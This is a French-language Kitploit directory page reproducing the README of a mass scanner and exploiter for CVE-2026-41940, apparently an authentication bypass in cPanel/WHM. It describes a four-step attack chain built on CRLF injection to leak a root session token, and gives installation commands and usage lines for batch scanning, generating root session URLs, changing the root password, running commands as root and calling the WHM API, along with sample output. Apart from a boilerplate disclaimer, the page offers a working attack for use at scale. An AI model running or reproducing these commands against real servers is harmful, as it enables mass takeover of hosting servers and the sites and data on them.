Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41940 — cPanel/WHM CVE-2026-41940 - Scanner de masse et exploiteur | Kitploit
Outils/GitHubGitHub/lutfifakee-project/cve-2026-41940
Scanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et ContrôleAuthentificationRed TeamingDéveloppement de Charges Utiles
GitHublutfifakee-project/cve-2026-41940

CVE-2026-41940

cPanel/WHM CVE-2026-41940 - Scanner de masse et exploiteur

25il y a 4 moisPas encore vérifié
Voir le dépôtSite web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-41940 - Scanner et outil d'exploitation du contournement d'authentification cPanel/WHM

Python License Security Tested on

Scanner et outil d'exploitation du contournement d'authentification cPanel/WHM pour CVE-2026-41940


⚠️ Avertissement

Cet outil est fourni uniquement à des fins éducatives et pour des tests de sécurité autorisés.

En utilisant cet outil, vous acceptez que :

  • Vous ne testerez que des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester.
  • Vous comprenez que l'accès non autorisé à des systèmes informatiques est illégal.
  • Vous êtes seul responsable de vos actions lors de l'utilisation de cet outil.
  • Vous ne pouvez pas redistribuer, modifier ou revendiquer cet outil comme étant le vôtre.

❗ L'auteur n'est PAS responsable des utilisations abusives, activités illégales, dommages ou conséquences juridiques résultant de l'utilisation de cet outil.


🎯 Présentation

CVE-2026-41940 est une vulnérabilité critique de contournement d'authentification dans cPanel/WHM qui peut permettre à des attaquants d'obtenir un accès root non autorisé sans identifiants valides.

Cet outil fournit une implémentation en Python pour :

  • Détecter les cibles vulnérables
  • Automatiser l'exploitation (pour des tests autorisés)
  • Effectuer des scans à grande échelle

🔥 Chaîne d'attaque en 4 étapes

ÉtapeDescription
1. Pré-authentificationEnvoyer des identifiants invalides à /login/ pour obtenir le cookie whostmgrsession
2. Injection CRLFInjecter un retour à la ligne via l'en-tête Authorization: Basic pour divulguer le jeton cpsess
3. Propagation du jetonDéclencher do_token_denied pour propager le jeton dans le cache
4. VérificationAccéder à /json-api/version pour confirmer l'accès root WHM

✨ Fonctionnalités

FonctionnalitéDescription
🔄 Scan par lotsScanner plusieurs cibles simultanément
🎯 Cible uniqueScanner une cible individuelle avec une sortie détaillée
🔌 Scan de portsScan automatique des ports WHM (2082, 2083, 2086, 2087)
🔓 URL de sessionGénérer une URL de connexion WHM en un clic
💀 RCEExécuter des commandes système en tant que root
🔑 Changer le mot de passeModifier le mot de passe root WHM
📡 Appels API WHMAppeler les fonctions de l'API WHM
🎨 Sortie coloréeSortie visuelle pour les résultats
💾 Exporter les résultatsEnregistrer les cibles vulnérables dans un fichier

📋 Prérequis

root@kitploit:~
Python 3.7+
pip install requests urllib3

🚀 Installation

root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt

# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com

📖 Utilisation

Commandes de base

root@kitploit:~
# Single target
python cpanel-mass-checker.py -u https://target.com:2087

# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20

# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt

# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com

# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com

# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com

# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com

📄 Format du fichier de cibles (targets.txt)

root@kitploit:~
# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083

⚙️ Paramètres

ParamètreDescriptionExemple
-uURL de cible unique-u https://target.com:2087
-fFichier de liste de cibles-f targets.txt
-cConcurrence (threads)-c 20
-oFichier de sortie-o results.txt
-hostnameEn-tête Host personnalisé-hostname cpanel.target.com
--scan-portsScanner tous les ports WHM--scan-ports
-sessionGénérer une URL de connexion-session
-passwdChanger le mot de passe root-passwd "NewPass123"
-cmdExécuter une commande-cmd "id"
-keepConserver le compte temporaire-keep
-apiAppeler l'API WHM-api listaccts
-api-paramsParamètres de l'API-api-params "user=root,password=123"

📊 Exemple de sortie

Scan par lots

root@kitploit:~
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt

Génération d'URL de session

root@kitploit:~
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
    https://example.com:2087/cpsessXXXXXXX/

🛡️ Détails de la vulnérabilité

ChampValeur
CVECVE-2026-41940
SévéritéCritique (CVSS 9.8)
Vecteur d'attaqueRéseau
Privilèges requisAucun
Interaction utilisateurAucune

Versions affectées

  • WHM 11.110.x < 11.110.0.97
  • WHM 11.118.x < 11.118.0.63
  • WHM 11.126.x < 11.126.0.54
  • WHM 11.132.x < 11.132.0.29
  • WHM 11.134.x < 11.134.0.20
  • WHM 11.136.x < 11.136.0.5

⚠️ Remarques importantes

  • À utiliser uniquement sur des systèmes autorisés
  • Les jetons de session expirent rapidement
  • La RCE peut échouer sur les licences restreintes
  • Certaines cibles nécessitent -hostname
  • Tout le trafic utilise HTTPS

🧪 Environnement de test

Pour des tests sûrs et légaux :

  • Utilisez votre propre VPS/serveur
  • Mettez en place un environnement de laboratoire vulnérable
  • Obtenez toujours une autorisation écrite

⭐ Support

Si ce projet vous a aidé, pensez à lui donner une ⭐

Télécharger l’outil